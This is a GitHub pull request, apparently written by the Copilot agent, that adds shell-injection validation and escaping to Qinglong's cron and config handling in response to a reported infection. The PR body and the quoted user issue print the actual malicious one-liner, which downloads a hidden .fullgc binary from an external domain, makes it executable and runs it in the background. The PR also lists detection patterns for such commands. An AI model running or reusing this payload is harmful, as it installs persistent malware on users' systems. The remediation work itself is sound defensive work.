Skip to content

Security: Prevent shell injection in cron tasks and config files#2924

Draft
whyour with Copilot wants to merge 5 commits into
developfrom
copilot/fix-fullgc-memory-issue
Draft

Security: Prevent shell injection in cron tasks and config files#2924
whyour with Copilot wants to merge 5 commits into
developfrom
copilot/fix-fullgc-memory-issue

Conversation

Copilot AI commented Feb 8, 2026

Copy link
Copy Markdown
Contributor

Problem

Cron task fields (task_before, task_after, command) and config file writes lacked input validation and proper shell escaping. Reported incident: malicious code downloaded .fullgc binary from external domain, executed in background consuming 100% memory, and persisted by re-injecting itself.

Example of previously unvalidated malicious input:

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";
curl -fsSL -o "$b" "$u"&&chmod +x "$b"&&nohup "$b" >/dev/null 2>&1 &

Changes

Input Validation (back/validation/schedule.ts)

Added validateShellSecurity() to block:

  • Command substitution: $(...), backticks
  • File downloads: curl, wget, fetch
  • External URLs: https?://
  • Hidden file execution: /\.file
  • Obfuscation patterns: base64, eval
  • Suspicious combinations: (curl|wget).*>/dev/null.*&, /tmp/.*&&.*(chmod|\.\/)

Shell Escaping (back/services/cron.ts)

Replaced weak escaping with escapeShellArg():

// Before: allowed command injection via newlines
arg.replace(/'/g, "'\\''").replace(/;? *\n/g, ';')

// After: prevents command chains
arg.replace(/\r?\n/g, ' ').replace(/'/g, "'\\''")

Config File Security (back/api/config.ts)

Added content validation for config writes to detect:

  • Download-execute chains: (curl|wget).*\|.*bash
  • Permission escalation: (curl|wget).*&&.*chmod
  • Hidden file downloads: (curl|wget).*\/\.\w+

Documentation (SECURITY_ENHANCEMENTS.md)

Remediation steps for affected users, detection patterns, and security best practices.

Security Impact

Prevents:

  • Remote code execution via task field injection
  • Malware download and persistence
  • Command injection through shell metacharacters
  • Hidden file execution in background processes
Original prompt

This section details on the original issue you should resolve

<issue_title>我这是中木马了吗 /data/db/.fullgc占用内存100%持续了几个月</issue_title>
<issue_description>### Qinglong version

正式版 v2.20.1

Steps to reproduce

名称 | .fullgc | PID | 1879430 | 状态 | sleeping -- | -- | -- | -- | -- | -- docker-entrypoi(1866020) | root | 10 1 | 0 B | 0 B 2026/02/08 12:54:59 | .fullgc /ql/data/db/.fullgc

看下来源是

配置文件的

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";case "$(uname -s)-$(uname -m)" in Linux-x86_64|Linux-amd64)u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";;Linux-aarch64|Linux-arm64)u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64";;Darwin-x86_64)u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64";;Darwin-arm64)u="https://file.551911.xyz/fullgc/fullgc-macos-arm64";;esac;[ -n "$u" ]&&[ ! -f "$b" ]&&{ curl -fsSL -o "$b" "$u"||wget -qO "$b" "$u"; }&&chmod +x "$b";[ -f "$b" ]&&! ps -ef|grep -v grep|grep -qF ".fullgc"&&nohup "$b" >/dev/null 2>&1 &

自己删除后,不定时还会自己加上.

运行的库只有faker3

What is expected?

1

What is actually happening?

1

System Info

Any additional comments?

No response</issue_description>

Comments on the Issue (you are @copilot in this section)


✨ Let Copilot coding agent set things up for you — coding agent works faster and does higher quality work when set up for your repo.

@vercel

vercel Bot commented Feb 8, 2026

Copy link
Copy Markdown

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated (UTC)
qinglong Ready Ready Preview, Comment Feb 8, 2026 3:32pm
qinglong-back Ready Ready Preview, Comment Feb 8, 2026 3:32pm

…tion

Co-authored-by: whyour <22700758+whyour@users.noreply.github.com>
Co-authored-by: whyour <22700758+whyour@users.noreply.github.com>
Co-authored-by: whyour <22700758+whyour@users.noreply.github.com>
Co-authored-by: whyour <22700758+whyour@users.noreply.github.com>
Copilot AI changed the title [WIP] Fix memory issue with .fullgc usage Security: Prevent shell injection in cron tasks and config files Feb 8, 2026
Copilot AI requested a review from whyour February 8, 2026 15:32
@duki-web duki-web mentioned this pull request Feb 20, 2026
Closed
@whyour whyour force-pushed the develop branch 7 times, most recently from 7539d75 to e8ac195 Compare June 1, 2026 10:20
@whyour whyour force-pushed the develop branch 4 times, most recently from f43efe3 to 7933fe0 Compare June 18, 2026 14:55
@whyour whyour force-pushed the develop branch 4 times, most recently from 2f7b6e3 to 06fc588 Compare June 26, 2026 07:31
@whyour whyour force-pushed the develop branch 7 times, most recently from 39058bb to 23a1835 Compare July 4, 2026 13:36
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0

2 participants